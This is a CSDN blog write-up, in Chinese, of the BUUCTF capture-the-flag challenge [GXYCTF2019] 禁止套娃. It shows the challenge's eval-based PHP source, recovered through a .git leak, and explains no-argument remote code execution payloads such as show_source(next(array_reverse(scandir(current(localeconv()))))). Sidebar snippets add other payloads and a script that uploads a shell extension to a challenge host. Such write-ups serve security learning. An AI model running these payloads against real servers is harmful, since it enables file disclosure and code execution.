BUUCTF:[GXYCTF2019]禁止套娃

最新推荐文章于 2024-03-19 23:55:30 发布
最新推荐文章于 2024-03-19 23:55:30 发布
阅读量1.4k 收藏 3
点赞数 5
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/110872903
版权 
https://buuoj.cn/challenges#[GXYCTF2019]%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83

在这里插入图片描述
在这里插入图片描述
.git泄露,使用GitHack

在这里插入图片描述
index.php

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

两个preg_match()过滤一些关键字,主要看到

preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])

?R表示引用正则表达式本身,那么这里允许传入的应该就是下面这种格式

xxx(xxx(xxx(...)));

函数形式,但是不能有参数,无参数RCE,这种时候就需要翻手册了,查找无参数可利用的函数

首先,需要一个浏览目录内的所有文件的函数,这个当然首选:scandir()。当scandir()传入'.',可以列出当前目录的所有文件
在这里插入图片描述
所以如果有函数能够返回'.'的话,就可以利用它作为scandir()的参数

localeconv() 函数返回一包含本地数字及货币格式信息的数组

在这里插入图片描述

接下来只需要使得指针指向这个数组内的第一个值

current() 函数返回数组中的当前元素的值。每个数组中都有一个内部的指针指向它的"当前"元素,初始指向插入到数组中的第一个元素。

pos() 函数返回数组中的当前元素的值。该函数是 current() 函数的别名。每个数组中都有一个内部的指针指向它的"当前"元素,初始指向插入到数组中的第一个元素。

?exp=var_dump(scandir(current(localeconv())));

在这里插入图片描述
接下来看如何读取到flag.php

next() 函数将内部指针指向数组中的下一个元素,并输出。

array_reverse() 函数返回翻转顺序的数组。

把数组顺序倒一下,然后使用next(),就可以读到flag

?exp=show_source(next(array_reverse(scandir(current(localeconv())))));

在这里插入图片描述

末 初
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
产品方法论:俄罗斯套娃原理.docx
12-06
【产品方法论:俄罗斯套娃原理】 产品方法论中的“俄罗斯套娃原理”是一个形象的比喻,用于描述产品发展过程中的“包含”关系。如同俄罗斯套娃,一个产品内部可以包含多个子产品或功能,每个子产品都是独立、完整且...
[BUUCTF刷题]禁止套娃
weixin_43952190的博客
07-01 2101
禁止套娃 exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); exp=show_source(array_rand(array_flip(scandir(pos(localeconv()))))); exp=show_source(session_id(session_start())); 进入后显示flag在哪儿,找不到线索,进行目录扫描。但也没有扫到。查看别人的wp发现是.git泄露。但是自己的网址下/.git
[GXYCTF2019]禁止套娃(无参数RCE)
记录学习,一起进步
01-19 1137
[GXYCTF2019]禁止套娃(无参数RCE)
BuuCTF [GXYCTF2019]禁止套娃详解(两种方法)
2301_76690905的博客
10-28 503
点入题目没有提示,常规抓包看源码扫目录,用dirsearch扫目录的时候扫出git第一眼看见第二个if语句,if(';R)?\)/', NULL, $_GET['exp']))可以看出这是典型的无参数rce,然后是后面的if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']),这里限制了phpinfo(),getcwd()这些函数用不了。
BUUCTF [GXYCTF2019] 禁止套娃
nareku的博客
06-29 1389
这题对我这个小白来说好难理解,慢慢补坑吧。PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通。打开题目,只有如下:看源码也没有什么东西,常见的信息泄露:robots协议,备用文件,目录爆破,.git泄露都试试(看其他师傅的wp:也可以扫描后台,不太清楚为什么自己实操跑不出来有点奇怪),最后发现是.git泄露使用GitHack工具,py脚本跑一下得到后台源码: 得到的源码会留在工具所在的文件夹内,查看里面的index.php页面源码 解题过程: (一)在上面传送门的那个师傅的博
BUUCTF-[GXYCTF2019]禁止套娃
yuqie的博客
04-06 256
对于第二个if,(?R)是引用当前表达式,(?\),可以迭代下去,那么它所匹配的就是print(echo(1))、a(b(c()));所以可以先利用函数array_reverse将数组反转,flag就在第二位了,再利用next指向第二位数组,在用文件显示包涵即可输出flag.php文件,构造payload。开始审计源码,我们最终的目标是执行@eval($_GET['exp']),从这开始瞄一下大佬的wp,因为我的脚本基础差的没眼看。pos(),传入数组,回显第一个数组的值,pos可以用current代替。
小福利,用Excel里面VLOOKUP函数实现双条件查找数据
热门推荐
littlespider889的博客
09-02 4万+
大家好,我是天空之城,今天给大家带来小福利,用Excel里面VLOOKUP函数实现双条件查找数据 我要从左边的1区域数据,来查找到我满足2区域条件的数据,就是比如J2这个单元格,同时满足职位是软件工程师,职级是高,两个条件,从1区域找到对应的工资数据, 输入VLOOKUP函数 =VLOOKUP(H2&I2,A:D,4,0) H2&I2表示需要同时满足的两个条件,A:D表示我要查找的数据源,4表示我要查找的工资所在列数,0表示精确查找,那么只输入这个公式是不够,我们还需要设置辅助列,也叫参考
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3466
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
Scratch图形化编程题:套娃生产机 根据输入的套娃层数,自动生产出套娃产品
05-27
Scratch图形化编程题:套娃生产机。 根据输入的套娃层数,自动生产出套娃产品。
俄罗斯套娃奖品Java程序
08-12
标题中的“俄罗斯套娃奖品Java程序”表明这是一个使用Java编程语言实现的程序,它可能与俄罗斯套娃这种玩具的概念相结合,创建出一种趣味性的计算模型或者游戏。俄罗斯套娃通常指的是一个大娃娃里面装着小一点的同款...
俄罗斯套娃
04-17
"俄罗斯套娃"这个标题可能是指一种特殊的数据处理或存储方式,它借鉴了传统玩具俄罗斯套娃的概念。在信息技术领域,这种比喻可能用于描述一种数据结构或者编程技巧,其中数据被嵌套在一个又一个的层次中,每个层级都...
俄罗斯套娃奖品C++程序
05-19
在IT领域,编程竞赛是一种锻炼和展示编程技巧的常见方式,而“俄罗斯套娃奖品C++程序”就是一个这样的例子,它曾出现在中兴通信公司的“捧月杯”编程竞赛中。这个程序的设计和实现利用了C++这门强大的编程语言,展示...
#WEB-buuctf-禁止套娃 1
weixin_52804141的博客
12-25 154
是一个黑名单绕过像et,na,info,dec,bin,hex,oct,pi,log,i不能使用。因为上述过滤的并未过滤 session_id() 所以我想到的使用 session_id来获取 flag。)时,可执行exp传递的命令。然后过滤了data协议,filter协议,php伪协议,phar。一,进入环境,在目录扫描未果,猜测可能是.git泄露,尝试一下。二,利用工具scrabble,果真是.git泄露。1,.git泄露,scrabble的使用。得到如下源码,开始代码审计。2,无参数RCE,通过。
wp-buuctf-禁止套娃(无参绕过)【多方法】
bin789456的博客
11-08 2136
wp 一开始没看到什么东西,那就开始找吧,常用备份,robots协议,目录爆破,git泄露慢慢试。 试了下git泄露,有东西了: 打开得到的index.php,源码如下: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
EXCEL:查找与引用函数
2301_76815178的博客
03-19 1723
EXCEL中常用的查找与引用功能
二维数组排序 行与列分别升序_6个经典排序技巧,尤其是最后一个,绝对的个性化...
weixin_39976166的博客
12-08 792
点击上方"Excel函数公式"免费订阅 排序,从字面意思理解就是将一组“无序”的记录调整为“有序”的记录。在Excel中,排序是一种常见的操作,那么,如何高效的完成排序操作呢?一、Excel排序:常规(命令)排序。目的:对“销量”升序排序。方法:1、选择目标区域。2、【数据】-【排序】,打开【排序】对话框。3、【主要关键字】中选择“销量”,【排序依据】中选择“单元格值”,【...
[GXYCTF2019]禁止套娃1 不会编程的崽的博客
不会编程的崽的博客
02-05 1241
ctf 源码泄露 无参数rce
[GXYCTF2019]禁止套娃--详解
金 帛的博客
06-12 2449
BUUCTF记录贴
南昌航空大学考研17个学院,59个专业课历年考试真题及答案汇总,备考资料题库笔记,专业课调剂信息查询.pdf
最新发布
07-15
南昌航空大学考研17个学院,59个专业课历年考试真题及答案汇总,备考资料题库笔记,专业课调剂信息查询.pdf
ctfshow套娃shell
08-24
CTFSHOW套娃shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套娃shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`php ext_skel.php --ext ctfshow --std`来生成该扩展的目录。 2. 进入生成的目录,并编辑.c文件,根据需要进行修改。 3. 执行以下命令来编译和安装扩展:`phpize ./configure make && make install`。编译完成后,会告知具体的扩展安装位置。 4. 通过发送POST请求,使用CTFSHOW套娃shell来写入并执行命令。示例代码如下: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'file': '/usr/local/lib/php/extensions/no-debug-non-zts-20180731/mysqli.so', 'content': open('ctfshow.so', 'rb').read()} requests.post(url + '?a=write', data=data) requests.get(url + '?a=run') ``` 5. 使用CTFSHOW套娃shell执行命令。可以使用以下命令示例: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'cmd': 'cat /f*'} requests.post(url + '?a=shell', data=data) ``` 这样,您就可以使用CTFSHOW套娃shell来执行命令并获取所需的结果了。请注意,使用套娃shell存在安全风险,应仅在合法和授权的情况下使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTFSHOW 常用姿势篇(811-820)](https://blog.csdn.net/miuzzx/article/details/124038567)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值